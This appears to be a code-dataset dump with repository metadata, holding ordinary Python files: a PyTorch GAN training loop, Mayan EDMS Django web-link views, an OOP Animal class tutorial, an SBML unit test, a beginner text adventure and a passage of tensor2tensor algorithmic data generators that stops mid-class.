best_eval_acc_epoch = epoch+1
torch.save(model.state_dict(), best_acc_file)
torch.save(critic.state_dict(), best_acc_critic_file)
torch.save(classifier.state_dict(), best_acc_classifier_file)
new_best = True
if(eval_loss < best_eval_loss):
best_eval_loss = eval_loss
best_eval_loss_epoch = epoch+1
torch.save(model.state_dict(), best_loss_file)
torch.save(critic.state_dict(), best_loss_critic_file)
torch.save(classifier.state_dict(), best_loss_classifier_file)
new_best = True
if(new_best):
with open(best_text, "w") as o_stream:
print("Best eval acc epoch:", best_eval_acc_epoch, file=o_stream)
print("Best eval acc:", best_eval_acc, file=o_stream)
print("")
print("Best eval loss epoch:", best_eval_loss_epoch, file=o_stream)
print("Best eval loss:", best_eval_loss, file=o_stream)
if(not args.no_tensorboard):
tensorboard_summary.add_scalar("Avg_CE_loss/train", train_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Avg_CE_loss/eval", eval_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/train", train_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Accuracy/eval", eval_acc, global_step=epoch+1)
tensorboard_summary.add_scalar("Learn_rate/train", lr, global_step=epoch+1)
tensorboard_summary.add_scalar("Critic_loss/train", dis_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Gen_loss/train", gen_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity_loss/train", cre_loss, global_step=epoch+1)
tensorboard_summary.add_scalar("GAN_accuracy/train", gan_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Class_accuracy/train", class_accuracy, global_step=epoch+1)
tensorboard_summary.add_scalar("Creativity/train", creativity, global_step=epoch+1)
tensorboard_summary.flush()
if((epoch+1) % args.weight_modulus == 0):
epoch_str = str(epoch+1).zfill(PREPEND_ZEROS_WIDTH)
path = os.path.join(weights_folder, "epoch_" + epoch_str + ".pickle")
torch.save(model.state_dict(), path)
with open(results_file, "a", newline="") as o_stream:
writer = csv.writer(o_stream)
writer.writerow([epoch+1, lr, train_loss, train_acc, eval_loss, eval_acc])
if(not args.no_tensorboard):
tensorboard_summary.flush()
return
if __name__ == "__main__":
main()
| true
| true
|
790dc82fad44913c8a30acf36c53c51c6aad0661
| 7,486
|
py
|
Python
|
mayan/apps/web_links/views.py
|
atitaya1412/Mayan-EDMS
|
bda9302ba4b743e7d829ad118b8b836221888172
|
[
"Apache-2.0"
] | 343
|
2015-01-05T14:19:35.000Z
|
2018-12-10T19:07:48.000Z
|
mayan/apps/web_links/views.py
|
atitaya1412/Mayan-EDMS
|
bda9302ba4b743e7d829ad118b8b836221888172
|
[
"Apache-2.0"
] | 191
|
2015-01-03T00:48:19.000Z
|
2018-11-30T09:10:25.000Z
|
mayan/apps/web_links/views.py
|
atitaya1412/Mayan-EDMS
|
bda9302ba4b743e7d829ad118b8b836221888172
|
[
"Apache-2.0"
] | 257
|
2019-05-14T10:26:37.000Z
|
2022-03-30T03:37:36.000Z
|
import logging
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import RedirectView
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document, DocumentType
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.views.generics import (
AddRemoveView, SingleObjectCreateView, SingleObjectDeleteView,
SingleObjectEditView, SingleObjectListView
)
from mayan.apps.views.mixins import ExternalObjectViewMixin
from .events import event_web_link_edited
from .forms import WebLinkForm
from .icons import icon_web_link_setup
from .links import link_web_link_create
from .models import ResolvedWebLink, WebLink
from .permissions import (
permission_web_link_create, permission_web_link_delete,
permission_web_link_edit, permission_web_link_instance_view,
permission_web_link_view
)
logger = logging.getLogger(name=__name__)
class DocumentTypeWebLinksView(AddRemoveView):
main_object_permission = permission_document_type_edit
main_object_model = DocumentType
main_object_pk_url_kwarg = 'document_type_id'
secondary_object_model = WebLink
secondary_object_permission = permission_web_link_edit
list_available_title = _('Available web links')
list_added_title = _('Web links enabled')
related_field = 'web_links'
def action_add(self, queryset, _event_actor):
for obj in queryset:
self.main_object.web_links.add(obj)
event_web_link_edited.commit(
actor=_event_actor, action_object=self.main_object, target=obj
)
def action_remove(self, queryset, _event_actor):
for obj in queryset:
self.main_object.web_links.remove(obj)
event_web_link_edited.commit(
actor=_event_actor, action_object=self.main_object, target=obj
)
def get_actions_extra_kwargs(self):
return {'_event_actor': self.request.user}
def get_extra_context(self):
return {
'object': self.main_object,
'title': _(
'Web links to enable for document type: %s'
) % self.main_object,
}
class ResolvedWebLinkView(ExternalObjectViewMixin, RedirectView):
external_object_pk_url_kwarg = 'document_id'
external_object_permission = permission_web_link_instance_view
external_object_queryset = Document.valid.all()
def get_redirect_url(self, *args, **kwargs):
return self.get_web_link().get_redirect(
document=self.external_object, user=self.request.user
).url
def get_web_link(self):
return get_object_or_404(
klass=self.get_web_link_queryset(), pk=self.kwargs['web_link_id']
)
def get_web_link_queryset(self):
queryset = ResolvedWebLink.objects.get_for(
document=self.external_object, user=self.request.user
)
return AccessControlList.objects.restrict_queryset(
permission=permission_web_link_instance_view, queryset=queryset,
user=self.request.user
)
class WebLinkCreateView(SingleObjectCreateView):
extra_context = {'title': _('Create new web link')}
form_class = WebLinkForm
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
view_permission = permission_web_link_create
def get_instance_extra_data(self):
return {'_event_actor': self.request.user}
class WebLinkDeleteView(SingleObjectDeleteView):
model = WebLink
object_permission = permission_web_link_delete
pk_url_kwarg = 'web_link_id'
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Delete web link: %s') % self.object
}
class WebLinkDocumentTypesView(AddRemoveView):
main_object_method_add_name = 'document_types_add'
main_object_method_remove_name = 'document_types_remove'
main_object_permission = permission_web_link_edit
main_object_model = WebLink
main_object_pk_url_kwarg = 'web_link_id'
secondary_object_model = DocumentType
secondary_object_permission = permission_document_type_edit
list_available_title = _('Available document types')
list_added_title = _('Document types enabled')
related_field = 'document_types'
def get_actions_extra_kwargs(self):
return {'_event_actor': self.request.user}
def get_extra_context(self):
return {
'object': self.main_object,
'title': _(
'Document type for which to enable web link: %s'
) % self.main_object,
}
class WebLinkEditView(SingleObjectEditView):
form_class = WebLinkForm
model = WebLink
object_permission = permission_web_link_edit
pk_url_kwarg = 'web_link_id'
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Edit web link: %s') % self.object
}
def get_instance_extra_data(self):
return {'_event_actor': self.request.user}
class WebLinkListView(SingleObjectListView):
object_permission = permission_web_link_view
def get_extra_context(self):
return {
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_web_link_setup,
'no_results_main_link': link_web_link_create.resolve(
context=RequestContext(request=self.request)
),
'no_results_text': _(
'Web links allow generating HTTP links from documents to '
'external resources. The link URL\'s can contain document '
'properties values.'
),
'no_results_title': _(
'There are no web links'
),
'title': _('Web links'),
}
def get_source_queryset(self):
return self.get_web_link_queryset()
def get_web_link_queryset(self):
return WebLink.objects.all()
class DocumentWebLinkListView(ExternalObjectViewMixin, WebLinkListView):
external_object_permission = permission_web_link_instance_view
external_object_pk_url_kwarg = 'document_id'
external_object_queryset = Document.valid.all()
object_permission = permission_web_link_instance_view
def get_extra_context(self):
return {
'document': self.external_object,
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_web_link_setup,
'no_results_text': _(
'Web links allow generating HTTP links from documents to '
'external resources. The link URL\'s can contain document '
'properties values.'
),
'no_results_title': _(
'There are no web links for this document'
),
'object': self.external_object,
'title': _('Web links for document: %s') % self.external_object,
}
def get_web_link_queryset(self):
return ResolvedWebLink.objects.get_for(
document=self.external_object, user=self.request.user
)
| 34.027273
| 78
| 0.687016
|
import logging
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import RedirectView
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document, DocumentType
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.views.generics import (
AddRemoveView, SingleObjectCreateView, SingleObjectDeleteView,
SingleObjectEditView, SingleObjectListView
)
from mayan.apps.views.mixins import ExternalObjectViewMixin
from .events import event_web_link_edited
from .forms import WebLinkForm
from .icons import icon_web_link_setup
from .links import link_web_link_create
from .models import ResolvedWebLink, WebLink
from .permissions import (
permission_web_link_create, permission_web_link_delete,
permission_web_link_edit, permission_web_link_instance_view,
permission_web_link_view
)
logger = logging.getLogger(name=__name__)
class DocumentTypeWebLinksView(AddRemoveView):
main_object_permission = permission_document_type_edit
main_object_model = DocumentType
main_object_pk_url_kwarg = 'document_type_id'
secondary_object_model = WebLink
secondary_object_permission = permission_web_link_edit
list_available_title = _('Available web links')
list_added_title = _('Web links enabled')
related_field = 'web_links'
def action_add(self, queryset, _event_actor):
for obj in queryset:
self.main_object.web_links.add(obj)
event_web_link_edited.commit(
actor=_event_actor, action_object=self.main_object, target=obj
)
def action_remove(self, queryset, _event_actor):
for obj in queryset:
self.main_object.web_links.remove(obj)
event_web_link_edited.commit(
actor=_event_actor, action_object=self.main_object, target=obj
)
def get_actions_extra_kwargs(self):
return {'_event_actor': self.request.user}
def get_extra_context(self):
return {
'object': self.main_object,
'title': _(
'Web links to enable for document type: %s'
) % self.main_object,
}
class ResolvedWebLinkView(ExternalObjectViewMixin, RedirectView):
external_object_pk_url_kwarg = 'document_id'
external_object_permission = permission_web_link_instance_view
external_object_queryset = Document.valid.all()
def get_redirect_url(self, *args, **kwargs):
return self.get_web_link().get_redirect(
document=self.external_object, user=self.request.user
).url
def get_web_link(self):
return get_object_or_404(
klass=self.get_web_link_queryset(), pk=self.kwargs['web_link_id']
)
def get_web_link_queryset(self):
queryset = ResolvedWebLink.objects.get_for(
document=self.external_object, user=self.request.user
)
return AccessControlList.objects.restrict_queryset(
permission=permission_web_link_instance_view, queryset=queryset,
user=self.request.user
)
class WebLinkCreateView(SingleObjectCreateView):
extra_context = {'title': _('Create new web link')}
form_class = WebLinkForm
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
view_permission = permission_web_link_create
def get_instance_extra_data(self):
return {'_event_actor': self.request.user}
class WebLinkDeleteView(SingleObjectDeleteView):
model = WebLink
object_permission = permission_web_link_delete
pk_url_kwarg = 'web_link_id'
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Delete web link: %s') % self.object
}
class WebLinkDocumentTypesView(AddRemoveView):
main_object_method_add_name = 'document_types_add'
main_object_method_remove_name = 'document_types_remove'
main_object_permission = permission_web_link_edit
main_object_model = WebLink
main_object_pk_url_kwarg = 'web_link_id'
secondary_object_model = DocumentType
secondary_object_permission = permission_document_type_edit
list_available_title = _('Available document types')
list_added_title = _('Document types enabled')
related_field = 'document_types'
def get_actions_extra_kwargs(self):
return {'_event_actor': self.request.user}
def get_extra_context(self):
return {
'object': self.main_object,
'title': _(
'Document type for which to enable web link: %s'
) % self.main_object,
}
class WebLinkEditView(SingleObjectEditView):
form_class = WebLinkForm
model = WebLink
object_permission = permission_web_link_edit
pk_url_kwarg = 'web_link_id'
post_action_redirect = reverse_lazy(
viewname='web_links:web_link_list'
)
def get_extra_context(self):
return {
'object': self.object,
'title': _('Edit web link: %s') % self.object
}
def get_instance_extra_data(self):
return {'_event_actor': self.request.user}
class WebLinkListView(SingleObjectListView):
object_permission = permission_web_link_view
def get_extra_context(self):
return {
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_web_link_setup,
'no_results_main_link': link_web_link_create.resolve(
context=RequestContext(request=self.request)
),
'no_results_text': _(
'Web links allow generating HTTP links from documents to '
'external resources. The link URL\'s can contain document '
'properties values.'
),
'no_results_title': _(
'There are no web links'
),
'title': _('Web links'),
}
def get_source_queryset(self):
return self.get_web_link_queryset()
def get_web_link_queryset(self):
return WebLink.objects.all()
class DocumentWebLinkListView(ExternalObjectViewMixin, WebLinkListView):
external_object_permission = permission_web_link_instance_view
external_object_pk_url_kwarg = 'document_id'
external_object_queryset = Document.valid.all()
object_permission = permission_web_link_instance_view
def get_extra_context(self):
return {
'document': self.external_object,
'hide_link': True,
'hide_object': True,
'no_results_icon': icon_web_link_setup,
'no_results_text': _(
'Web links allow generating HTTP links from documents to '
'external resources. The link URL\'s can contain document '
'properties values.'
),
'no_results_title': _(
'There are no web links for this document'
),
'object': self.external_object,
'title': _('Web links for document: %s') % self.external_object,
}
def get_web_link_queryset(self):
return ResolvedWebLink.objects.get_for(
document=self.external_object, user=self.request.user
)
| true
| true
|
790dc9935531c6d0395bf850f4f155b21979dd25
| 4,273
|
py
|
Python
|
Module 2/B04710_CodeBundle/Chapter 4/B04170_04_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 8
|
2016-10-16T13:01:30.000Z
|
2021-11-08T13:10:17.000Z
|
Module 2/B04710_CodeBundle/Chapter 4/B04170_04_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | null | null | null |
Module 2/B04710_CodeBundle/Chapter 4/B04170_04_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 5
|
2016-08-24T09:43:42.000Z
|
2019-11-20T10:54:29.000Z
|
class Animal:
_number_of_legs = 0
_pairs_of_eyes = 0
def __init__(self, age):
self._age = age
print("Animal created")
@property
def age(self):
return self._age
@age.setter
def age(self, age):
self._age = age
def print_legs_and_eyes(self):
print("I have " + str(self._number_of_legs) + " legs and " + str(self._pairs_of_eyes * 2) + " eyes.")
def print_age(self):
print("I am " + str(self._age) + " years old.")
class Mammal(Animal):
_pairs_of_eyes = 1
def __init__(self, age, is_pregnant=False):
super().__init__(age)
self._is_pregnant = is_pregnant
print("Mammal created")
@property
def is_pregnant(self):
return self._is_pregnant
@is_pregnant.setter
def is_pregnant(self, is_pregnant):
self._is_pregnant = is_pregnant
class DomesticMammal(Mammal):
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(age, is_pregnant)
self._name = name
self._favorite_toy = favorite_toy
print("DomesticMammal created")
@property
def name(self):
return self._name
@property
def favorite_toy(self):
return self._favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self._favorite_toy = favorite_toy
def talk(self):
print(self._name + ": talks")
class Dog(DomesticMammal):
_number_of_legs = 4
_breed = "Just a dog"
_breed_family = "Dog"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("Dog created")
def bark(self, times=1, other_domestic_mammal=None, is_angry=False):
message = self.name
if other_domestic_mammal is not None:
message += " to " + other_domestic_mammal.name + ": "
else:
message += ": "
if is_angry:
message += "Grr "
message += "Woof " * times
print(message)
def talk(self):
self.bark()
@classmethod
def print_breed(cls):
print(cls._breed)
@classmethod
def print_breed_family(cls):
print(cls._breed_family)
class TerrierDog(Dog):
_breed = "Terrier dog"
_breed_family = "Terrier"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("TerrierDog created")
class SmoothFoxTerrier(TerrierDog):
_breed = "Smooth Fox Terrier"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("SmoothFoxTerrier created")
class Animal:
_number_of_legs = 0
_pairs_of_eyes = 0
def __init__(self, age):
self._age = age
print("Animal created")
@property
def age(self):
return self._age
@age.setter
def age(self, age):
self._age = age
def print_legs_and_eyes(self):
print("I have " + str(self._number_of_legs) + " legs and " + str(self._pairs_of_eyes * 2) + " eyes.")
def print_age(self):
print("I am " + str(self._age) + " years old.")
def __lt__(self, other):
return self.age < other.age
def __le__(self, other):
return self.age <= other.age
def __gt__(self, other):
return self.age > other.age
def __ge__(self, other):
return self.age >= other.age
SmoothFoxTerrier.print_breed()
SmoothFoxTerrier.print_breed_family()
tom = SmoothFoxTerrier("Tom", 5, "Sneakers")
print(isinstance(tom, Animal))
print(isinstance(tom, Mammal))
print(isinstance(tom, DomesticMammal))
print(isinstance(tom, Dog))
print(isinstance(tom, TerrierDog))
print(isinstance(tom, SmoothFoxTerrier))
pluto = SmoothFoxTerrier("Pluto", 6, "Tennis ball")
goofy = SmoothFoxTerrier("Goofy", 8, "Soda bottle")
print(tom > pluto)
print(tom < pluto)
print(goofy >= tom)
print(tom <= goofy)
tom.bark()
tom.bark(2)
tom.bark(2, pluto)
tom.bark(3, pluto, True)
| 23.097297
| 110
| 0.608238
|
class Animal:
_number_of_legs = 0
_pairs_of_eyes = 0
def __init__(self, age):
self._age = age
print("Animal created")
@property
def age(self):
return self._age
@age.setter
def age(self, age):
self._age = age
def print_legs_and_eyes(self):
print("I have " + str(self._number_of_legs) + " legs and " + str(self._pairs_of_eyes * 2) + " eyes.")
def print_age(self):
print("I am " + str(self._age) + " years old.")
class Mammal(Animal):
_pairs_of_eyes = 1
def __init__(self, age, is_pregnant=False):
super().__init__(age)
self._is_pregnant = is_pregnant
print("Mammal created")
@property
def is_pregnant(self):
return self._is_pregnant
@is_pregnant.setter
def is_pregnant(self, is_pregnant):
self._is_pregnant = is_pregnant
class DomesticMammal(Mammal):
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(age, is_pregnant)
self._name = name
self._favorite_toy = favorite_toy
print("DomesticMammal created")
@property
def name(self):
return self._name
@property
def favorite_toy(self):
return self._favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self._favorite_toy = favorite_toy
def talk(self):
print(self._name + ": talks")
class Dog(DomesticMammal):
_number_of_legs = 4
_breed = "Just a dog"
_breed_family = "Dog"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("Dog created")
def bark(self, times=1, other_domestic_mammal=None, is_angry=False):
message = self.name
if other_domestic_mammal is not None:
message += " to " + other_domestic_mammal.name + ": "
else:
message += ": "
if is_angry:
message += "Grr "
message += "Woof " * times
print(message)
def talk(self):
self.bark()
@classmethod
def print_breed(cls):
print(cls._breed)
@classmethod
def print_breed_family(cls):
print(cls._breed_family)
class TerrierDog(Dog):
_breed = "Terrier dog"
_breed_family = "Terrier"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("TerrierDog created")
class SmoothFoxTerrier(TerrierDog):
_breed = "Smooth Fox Terrier"
def __init__(self, name, age, favorite_toy, is_pregnant=False):
super().__init__(name, age, favorite_toy, is_pregnant)
print("SmoothFoxTerrier created")
class Animal:
_number_of_legs = 0
_pairs_of_eyes = 0
def __init__(self, age):
self._age = age
print("Animal created")
@property
def age(self):
return self._age
@age.setter
def age(self, age):
self._age = age
def print_legs_and_eyes(self):
print("I have " + str(self._number_of_legs) + " legs and " + str(self._pairs_of_eyes * 2) + " eyes.")
def print_age(self):
print("I am " + str(self._age) + " years old.")
def __lt__(self, other):
return self.age < other.age
def __le__(self, other):
return self.age <= other.age
def __gt__(self, other):
return self.age > other.age
def __ge__(self, other):
return self.age >= other.age
SmoothFoxTerrier.print_breed()
SmoothFoxTerrier.print_breed_family()
tom = SmoothFoxTerrier("Tom", 5, "Sneakers")
print(isinstance(tom, Animal))
print(isinstance(tom, Mammal))
print(isinstance(tom, DomesticMammal))
print(isinstance(tom, Dog))
print(isinstance(tom, TerrierDog))
print(isinstance(tom, SmoothFoxTerrier))
pluto = SmoothFoxTerrier("Pluto", 6, "Tennis ball")
goofy = SmoothFoxTerrier("Goofy", 8, "Soda bottle")
print(tom > pluto)
print(tom < pluto)
print(goofy >= tom)
print(tom <= goofy)
tom.bark()
tom.bark(2)
tom.bark(2, pluto)
tom.bark(3, pluto, True)
| true
| true
|
790dc993af14fbf202955f5e6c992d231e8d2f2f
| 812
|
py
|
Python
|
tests/test_function_definition.py
|
joseph-hellerstein/symSBML-deprecated
|
197f1860bb2e8c5648b3d95d51f8b774fadcaa68
|
[
"MIT"
] | 1
|
2021-01-10T03:39:59.000Z
|
2021-01-10T03:39:59.000Z
|
tests/test_function_definition.py
|
joseph-hellerstein/symSBML-deprecated
|
197f1860bb2e8c5648b3d95d51f8b774fadcaa68
|
[
"MIT"
] | null | null | null |
tests/test_function_definition.py
|
joseph-hellerstein/symSBML-deprecated
|
197f1860bb2e8c5648b3d95d51f8b774fadcaa68
|
[
"MIT"
] | 3
|
2020-08-06T08:02:31.000Z
|
2022-01-16T18:08:35.000Z
|
"""
Tests for Reactions
"""
from src.common import constants as cn
from src.common.simple_sbml import SimpleSBML
from src.common import simple_sbml
from src.common.function_definition import FunctionDefinition
from tests.common import helpers
import copy
import libsbml
import numpy as np
import unittest
IGNORE_TEST = False
IS_PLOT = False
#############################
# Tests
#############################
class TestFunctionDefinition(unittest.TestCase):
def setUp(self):
self.simple = helpers.getSimple_BIOMD56()
self.function_definition = FunctionDefinition(
self.simple.model.getFunctionDefinition(0))
def testConstructor(self):
if IGNORE_TEST:
return
self.assertEqual(len(self.function_definition.argument_names), 4)
if __name__ == '__main__':
unittest.main()
| 21.368421
| 69
| 0.716749
|
from src.common import constants as cn
from src.common.simple_sbml import SimpleSBML
from src.common import simple_sbml
from src.common.function_definition import FunctionDefinition
from tests.common import helpers
import copy
import libsbml
import numpy as np
import unittest
IGNORE_TEST = False
IS_PLOT = False
| true
| true
|
790dc9cd46fdf4e0494e3bb706af8f1b46702da5
| 2,002
|
py
|
Python
|
ex35.py
|
Eithandarphyo51/python-test-exercises
|
85d1cbb82fc878315be46d168e5eb0f949c6ded4
|
[
"MIT"
] | null | null | null |
ex35.py
|
Eithandarphyo51/python-test-exercises
|
85d1cbb82fc878315be46d168e5eb0f949c6ded4
|
[
"MIT"
] | null | null | null |
ex35.py
|
Eithandarphyo51/python-test-exercises
|
85d1cbb82fc878315be46d168e5eb0f949c6ded4
|
[
"MIT"
] | null | null | null |
from sys import exit
def gold_room():
print("This room is full of gold. How much do you t ake?")
choice = input("> ")
if "0" in choice or "1" in choice:
how_much = int(choice)
else:
dead("Man, learn to type a number.")
if how_much < 50:
print("Nice, you're not greedy, you win!")
exit(0)
else:
dead("You greedy bastard!")
def bear_room():
print("There is a bear here.")
print("The bear has a bunch of honey.")
print("The fat bear is in front of another door.")
print("How are you going to move the bear?")
bear_moved = False
while True:
choice = input("> ")
if choice == "take honey":
dead("The bear looks at you then slaps your face off.")
elif choice == "taunt bear" and not bear_moved:
print("The bear has moved from the door.")
print("You can go through it now.")
bear_moved = True
elif choice == "taunt bear" and bear_moved:
dead("The bear gets pissed off and chews your leg off.")
elif choice == "open door" and bear_moved:
gold_room()
else:
print("I got not idea what that means.")
def cthulhu_room():
print("Here you see the great evil Cthulhu.")
print("He, it, whatever stares at you and you go insane.")
print("Do you flee for your life or eat your head?")
choice = input("> ")
if "flee" in choice:
start()
elif "head" in choice:
dead("Well that was tasty!")
else:
cthulhu_room()
def dead(why):
print(why, "Good job!")
exit(0)
def start():
print("You are in a dark room.")
print("There is a door to your right and left.")
print("Which one do you take?")
choice = input("> ")
if choice == "left":
bear_room()
elif choice == "right":
cthulhu_room()
else:
dead("You stumble around the room until you starve.")
start()
| 25.025
| 83
| 0.564935
|
from sys import exit
def gold_room():
print("This room is full of gold. How much do you t ake?")
choice = input("> ")
if "0" in choice or "1" in choice:
how_much = int(choice)
else:
dead("Man, learn to type a number.")
if how_much < 50:
print("Nice, you're not greedy, you win!")
exit(0)
else:
dead("You greedy bastard!")
def bear_room():
print("There is a bear here.")
print("The bear has a bunch of honey.")
print("The fat bear is in front of another door.")
print("How are you going to move the bear?")
bear_moved = False
while True:
choice = input("> ")
if choice == "take honey":
dead("The bear looks at you then slaps your face off.")
elif choice == "taunt bear" and not bear_moved:
print("The bear has moved from the door.")
print("You can go through it now.")
bear_moved = True
elif choice == "taunt bear" and bear_moved:
dead("The bear gets pissed off and chews your leg off.")
elif choice == "open door" and bear_moved:
gold_room()
else:
print("I got not idea what that means.")
def cthulhu_room():
print("Here you see the great evil Cthulhu.")
print("He, it, whatever stares at you and you go insane.")
print("Do you flee for your life or eat your head?")
choice = input("> ")
if "flee" in choice:
start()
elif "head" in choice:
dead("Well that was tasty!")
else:
cthulhu_room()
def dead(why):
print(why, "Good job!")
exit(0)
def start():
print("You are in a dark room.")
print("There is a door to your right and left.")
print("Which one do you take?")
choice = input("> ")
if choice == "left":
bear_room()
elif choice == "right":
cthulhu_room()
else:
dead("You stumble around the room until you starve.")
start()
| true
| true
|
790dcb854858e35c21f05a12f5c5e59fd69b88de
| 17,505
|
py
|
Python
|
tensor2tensor/data_generators/algorithmic.py
|
shankharaj29/tensor2tensor
|
b89ba51a6fa9e0c20009cfb57ee8de04f7138392
|
[
"Apache-2.0"
] | 1
|
2019-02-16T10:39:45.000Z
|
2019-02-16T10:39:45.000Z
|
tensor2tensor/data_generators/algorithmic.py
|
PedroLelis/tensor2tensor
|
5a867d031bd493eeb7d2776e1118d1594ff0a623
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/data_generators/algorithmic.py
|
PedroLelis/tensor2tensor
|
5a867d031bd493eeb7d2776e1118d1594ff0a623
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Algorithmic data generators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import numpy as np
from six.moves import range # pylint: disable=redefined-builtin
from tensor2tensor.data_generators import generator_utils as utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.layers import modalities
from tensor2tensor.utils import metrics
from tensor2tensor.utils import registry
import tensorflow as tf
class AlgorithmicProblem(problem.Problem):
"""Base class for algorithmic problems."""
@property
def num_symbols(self):
raise NotImplementedError()
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generates the data."""
raise NotImplementedError()
@property
def train_length(self):
return 40
@property
def dev_length(self):
return 400
@property
def train_size(self):
return 100000
@property
def dev_size(self):
return 10000
@property
def num_shards(self):
return 10
def generate_data(self, data_dir, _, task_id=-1):
def generator_eos(nbr_symbols, max_length, nbr_cases):
"""Shift by NUM_RESERVED_IDS and append EOS token."""
for case in self.generator(nbr_symbols, max_length, nbr_cases):
new_case = {}
for feature in case:
new_case[feature] = [
i + text_encoder.NUM_RESERVED_TOKENS for i in case[feature]
] + [text_encoder.EOS_ID]
yield new_case
utils.generate_dataset_and_shuffle(
generator_eos(self.num_symbols, self.train_length, self.train_size),
self.training_filepaths(data_dir, self.num_shards, shuffled=True),
generator_eos(self.num_symbols, self.dev_length, self.dev_size),
self.dev_filepaths(data_dir, 1, shuffled=True),
shuffle=False)
def hparams(self, defaults, unused_model_hparams):
p = defaults
vocab_size = self.num_symbols + text_encoder.NUM_RESERVED_TOKENS
p.modality = {"inputs": modalities.ModalityType.SYMBOL,
"targets": modalities.ModalityType.SYMBOL}
p.vocab_size = {"inputs": vocab_size,
"targets": vocab_size}
p.input_space_id = problem.SpaceID.DIGIT_0
p.target_space_id = problem.SpaceID.DIGIT_1
@registry.register_problem
class AlgorithmicIdentityBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary identity task."""
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generator for the identity (copy) task on sequences of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn uniformly at random from [0, nbr_symbols) until
nbr_cases sequences have been produced.
Args:
nbr_symbols: number of symbols to use in each sequence.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
input-list and target-list are the same.
"""
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": inputs}
@registry.register_problem
class AlgorithmicIdentityDecimal40(AlgorithmicIdentityBinary40):
"""Problem spec for algorithmic decimal identity task."""
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicShiftDecimal40(AlgorithmicProblem):
"""Problem spec for algorithmic decimal shift task."""
@property
def num_symbols(self):
return 20
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generator for the shift task on sequences of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn uniformly at random from [0, nbr_symbols - shift]
until nbr_cases sequences have been produced (output[i] = input[i] + shift).
Args:
nbr_symbols: number of symbols to use in each sequence (input + output).
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list[i] = input-list[i] + shift.
"""
shift = 10
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols - shift) for _ in range(l)]
yield {"inputs": inputs, "targets": [i + shift for i in inputs]}
@property
def dev_length(self):
return 80
@registry.register_problem
class AlgorithmicReverseBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary reversing task."""
@property
def num_symbols(self):
